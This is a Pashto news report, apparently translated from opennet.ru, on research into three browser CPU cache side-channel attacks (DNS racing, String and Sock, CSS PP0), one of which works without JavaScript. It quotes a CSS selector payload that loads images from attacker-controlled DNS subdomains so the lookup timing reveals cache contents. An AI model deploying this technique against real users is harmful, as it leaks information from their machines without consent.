د CPU کیچ استخراج برید د جاوا سکریپټ پرته په ویب براوزر کې پلي شوی

د ډیری امریکایی ، اسراییلو او آسټرالیا پوهنتونونو څیړونکو یوې ډلې درې بریدونه رامینځته کړي چې په ویب براوزرونو کې د پروسیسر کیچ مینځپانګې په اړه معلومات راوباسي. یو میتود پرته له جاواسکریپټ څخه په براوزرونو کې کار کوي ، او نور دوه د اړخ چینل بریدونو پروړاندې د محافظت موجوده میتودونو څخه تیریږي ، پشمول هغه چې په تور براوزر او ډیټر فاکس کې کارول کیږي. د بریدونو ښودلو لپاره کوډ، او همدارنګه د سرور اجزا چې د بریدونو لپاره اړین دي، په GitHub کې خپاره شوي.

د کیچ مینځپانګې تحلیل کولو لپاره ، ټول بریدونه د Prime+Probe میتود کاروي ، کوم چې د ارزښتونو معیاري سیټ سره کیچ ډکول او د بیا ډکولو پرمهال دوی ته د لاسرسي وخت اندازه کولو سره بدلونونه کشف کول شامل دي. په براوزرونو کې موجود امنیتي میکانیزمونو څخه د مخنیوي لپاره چې د دقیق وخت اندازه کولو سره مداخله کوي، په دوه اختیارونو کې، د DNS یا WebSocket سرور ته اپیل کیږي چې د برید کونکي لخوا کنټرول کیږي، کوم چې د ترلاسه شوي غوښتنو وخت لاګ ساتي. په یو شکل کې، د DNS یو ثابت ځواب وخت د وخت حوالې په توګه کارول کیږي.

اندازه کول د بهرني DNS یا WebSocket سرورونو په کارولو سره ترسره شوي، د ماشین زده کړې پراساس د ډلبندۍ سیسټم په کارولو سره، په خورا غوره سناریو کې تر 98٪ پورې دقت سره د ارزښتونو وړاندوینې لپاره کافي و (اوسط 80-90٪). د برید میتودونه په مختلف هارډویر پلیټ فارمونو کې ازمول شوي (Intel, AMD Ryzen, Apple M1, Samsung Exynos) او نړیوال ثابت شوي.

د CPU کیچ استخراج برید د جاوا سکریپټ پرته په ویب براوزر کې پلي شوی

د DNS ریسینګ برید لومړی ډول د جاواسکریپټ صفونو په کارولو سره د Prime+Probe میتود کلاسیک پلي کول کاروي. توپیرونه د بهرني DNS پراساس ټایمر او د غلطی اداره کونکي کارولو ته راښکته کیږي ، کوم چې هغه وخت رامینځته کیږي کله چې د غیر موجود ډومین څخه د عکس پورته کولو هڅه کیږي. یو بهرنی ټایمر په براوزرونو باندې د Prime+Probe برید لپاره اجازه ورکوي چې د جاواسکریپټ ټایمرونو ته لاسرسی محدود یا غیر فعال کړي.

د DNS سرور لپاره چې په ورته ایترنیټ شبکه کې موقعیت لري، د ټایمر دقیقیت نږدې 2 ms اټکل شوی، کوم چې د اړخ چینل برید ترسره کولو لپاره کافي دی (د پرتله کولو لپاره، په تور براوزر کې د معیاري جاواسکریپټ ټایمر درستیت دی. 100 ms ته راټیټ شو). د برید لپاره، د DNS سرور کنټرول ته اړتیا نشته، ځکه چې د عملیاتو د اجرا کولو وخت ټاکل شوی ترڅو د DNS څخه د غبرګون وخت د چک د مخکینۍ بشپړیدو نښه وي (په دې پورې اړه لري چې آیا د غلطی اداره کوونکی محرک شوی که نه دمخه یا وروسته ، د کیچ سره د چیک عملیاتو سرعت په اړه یوه پایله اخستل کیږي) .

د دویم برید طریقه، "سټرینګ او ساک"، موخه دا ده چې د امنیتي تخنیکونو مخه ونیسي چې په جاواسکریپټ کې د ټیټې کچې کارول محدودوي. د صفونو پرځای، سټرینګ او ساک په خورا لوی تارونو کې عملیات کاروي، د هغې اندازه غوره شوې ترڅو متغیر ټول LLC کیچ (د وروستۍ کچې کیچ) پوښي. بیا، د indexOf() فنکشن په کارولو سره، په تار کې یو کوچنی سبسټرینګ پلټل کیږي، کوم چې په پیل کې د سرچینې تار کې غیر حاضر وي، د بیلګې په توګه. د لټون عملیات په ټول تار کې تکرار کیږي. څرنګه چې د لاین اندازه د LLC کیچ اندازې سره مطابقت لري، سکین کول تاسو ته اجازه درکوي د کیچ چیک عملیات ترسره کړئ پرته له دې چې د صفونو له مینځه وړل. د ځنډ اندازه کولو لپاره ، د DNS پرځای ، د برید کونکي لخوا کنټرول شوي ویب ساکټ سرور ته زنګ وهل کیږي - مخکې لدې چې د لټون عملیات بشپړ شي ، پوښتنې په لیکه کې لیږل کیږي ، چې پراساس سرور د کیچ تحلیل کولو لپاره کارول شوي ځنډ محاسبه کوي. منځپانګې

د "CSS PP0" برید دریم ډول د HTML او CSS له لارې پلي کیږي، او کولی شي په براوزرونو کې د JavaScript غیر فعال سره کار وکړي. طریقه د "سټرینګ او ساک" سره ورته ده، مګر د جاواسکریپټ سره تړلې نه ده. د برید په جریان کې، د CSS انتخاب کونکو سیټ رامینځته شوی چې د ماسک لخوا لټون کوي. لومړنی لوی تار چې کیچ ډکوي د خورا لوی ټولګي نوم سره د div ټګ رامینځته کولو سره تنظیم شوی. دننه د خپلو پیژندونکو سره د نورو ډیویو سیټ شتون لري. د دې nested divs هر یو د انتخاب کونکي سره خپل سټایل لري چې د فرعي سټینګ لټون کوي. کله چې یوه پاڼه وړاندې کوي، براوزر لومړی هڅه کوي چې د داخلي ویشونو پروسس وکړي، کوم چې په لوی قطار کې د لټون عملیات پایله کوي. لټون په قصدي ډول ورک شوي ماسک په کارولو سره ترسره کیږي او په ټوله لیکه کې تکرار کیدو لامل کیږي ، وروسته له هغه چې "نه" حالت رامینځته کیږي او د تصادفي ډومینونو حواله کولو لپاره د شالید عکس پورته کولو هڅه کیږي: #pp:not([class*=’xjtoxg’]) #s0 {background-image: url(«https://qdlvibmr.helldomain.oy.ne.ro»);} #pp:not([class*=’gzstxf’]) #s1 {background-image: url(«https://licfsdju.helldomain.oy.ne.ro»);} … ایکس ایکس ...

فرعي ډومینونه د برید کونکي DNS سرور لخوا خدمت کیږي، کوم چې کولی شي د غوښتنو په ترلاسه کولو کې ځنډ اندازه کړي. د DNS سرور د ټولو غوښتنو لپاره NXDOMAIN مسله کوي او د غوښتنو دقیق وخت لاګ ساتي. د divs سیټ پروسس کولو په پایله کې ، د برید کونکي DNS سرور یو لړ غوښتنې ترلاسه کوي ، د کوم ځنډ ترمینځ چې د کیچ مینځپانګې چیک کولو پایلې سره تړاو لري.

د CPU کیچ استخراج برید د جاوا سکریپټ پرته په ویب براوزر کې پلي شوی


سرچینه: opennet.ru

Add a comment